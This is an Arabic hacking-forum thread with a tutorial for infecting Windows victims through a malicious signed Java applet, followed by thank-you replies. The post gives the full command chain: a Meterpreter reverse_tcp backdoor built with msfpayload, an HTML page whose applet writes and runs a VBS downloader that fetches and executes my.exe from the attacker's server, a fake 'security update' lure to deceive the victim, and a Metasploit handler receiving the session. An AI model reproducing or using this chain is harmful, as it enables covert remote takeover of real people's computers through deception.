![]() |
شرح الاختراق عن طريق Applet Infection java http://img38.imageshack.us/img38/8928/gadc.png في البداية يجب أن نحمل جافا كود: root@bt4:/# apt-get install sun-java6-jdk نقوم بإنشاء مجلد ونسميه ****-applet كود: root@bt4:/# mkdir ./java-applet بعد الدخول إلى المجلد نقوم بتحميل script و من أراد نسخه حفض هذا الكود بإسم MSFcmd.java في مجلد جافا -applet كود: import java.applet.*; بعد تحميل script وإضافة كود جافا MSFcmd.جافا نقوم بتشغيل بالأمر ./makeapplet.sh كود: عند الحصول على done وإدخال الاجابات المكتوبة بلون الأحمر نكتب الكود التالي كود: root@bt4:/java-applet/# cp SignedMSFcmd.jar /var/www/ كود: root@bt4:/java-applet/# cp MSFcmd.class /var/www/ كود: root@bt4:/java-applet/# apache2ctl start نعمل باكدور بالأداة msfpayload كود: root@bt4:/pentest/exploits/framework3/# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t exe -o my.exe كود: root@bt4:/pentest/exploits/framework3/# cp ./my.exe /var/www كود: root@bt4:/pentest/exploits/framework3/# chmod a+x /var/www/my.exe الأن سنقوم بعمل صفحة ملقمة بالبكدور مع رسالة جافا لتحديث أمني ونقنع الضحية بالموافقة عليه تغيير x xx x إلى ip إعدادات الصفحة html في المرفقات كود: root@bt4:/pentest/exploits/framework3/# echo "<applet width='1' height='1' code='MSFcmd.class' archive='SignedMSFcmd.jar'>" > كود: root@bt4:/pentest/exploits/framework3/# echo "<param name='first' value='cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\apsou.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\apsou.vbs & echo Dim BinaryStream >> C:\windows\apsou.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\apsou.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\apsou.vbs & echo BinaryStream.Open >> C:\windows\apsou.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\apsou.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\apsou.vbs & echo Function BinaryGetURL(URL) >> C:\windows\apsou.vbs & echo Dim Http >> C:\windows\apsou.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\apsou.vbs & echo Http.Open "GET", URL, False >> C:\windows\apsou.vbs & echo Http.Send >> C: windows\apsou.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\apsou.vbs & echo End Function >> C:\windows\apsou.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\apsou.vbs & echo shell.Run "C:\windows\my.exe" >> C:\windows\apsou.vbs & start C:\windows\apsou.vbs http://X.X.X.X/my.exe C:\windows\my.exe'> </applet>" >> /var/www/index.html كود: root@bt4:/pentest/exploits/framework3/# echo "" >> /var/www/index.html كود: root@bt4:/pentest/exploits/framework3/# echo "Please wait. We appreciate your business. This process may take a while." >> /var/www/index.html كود: root@bt4:/pentest/exploits/framework3/# echo "To view this page properly you must accept and run the applet. نقوم الأن بتشغيل ميسبلويت مع الإداة multi/handler وبايلود meterpreter /reverse_tcp كود: msf > use exploit/multi/handler . بعد الموافقة على التحديث ستفتح sessions كود: msf exploit(handler) >[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (A.A.A.A:443 -> T.T.T.T:44477) كما في الصورة التالية http://img200.imageshack.us/img200/4971/snapshot2l.png |
مشكووووووووووووور اخي معاقب تحياتي لك يا طيب تقبل مروري |
great bro keep up |
ارجو في اكمرة القادمة ان يكون الشرح مصور لتفادي الحماية |
مشكور الله يعطيك الف عافية سيتم التجريب في اقرب فرصة شكرا لك ثانية ننظر جديدك يامبدع |
بارك الله فيك ياغالي وهل يمكنني بهذه الطريقه الاختراق عن طريق الاي بي لانني لم افهم على العموم مشكور ياغالي وواصل بلا فواصل .. بالتوفيق يابطل .. |
اقتباس:
المهم المسار الموجود فيه الملف وشكراً على الردود:a14: في بعض الأحيان يسألني احدهم عن مشكلات :grr:ما أنا لا ادعي المعرفة ومازلت مبتدئ :icon666: ولكن الفرق هو حب البحث والمطالعة بنفسي و إذا واجهت مشكلة أصر على لبحث حتى أجد الحل.:a43: تجد الكثيرين يظنون أن الميتا كبرنامج بفروست:a43: تضع ip و-exploit تخترق الجهاز لا ليست بتلك السهولة و تجد في أحيان كثيرة لا يعرف شيء عن الإداة:088: فلها موقع رسمي مجاني فيه جميع الاوامر المهمة يجب الاطلاع عليها ومهم تثبيت برنامج وهمي لعمل pentest lab لتجرب عليها الثغرات وتفهم كيف تعمل :a41: |
يعطيك العافية دمت بخير |
مشكور وتقبل مروري |
الساعة الآن 02:11 AM |
[ vBspiders.Com Network ]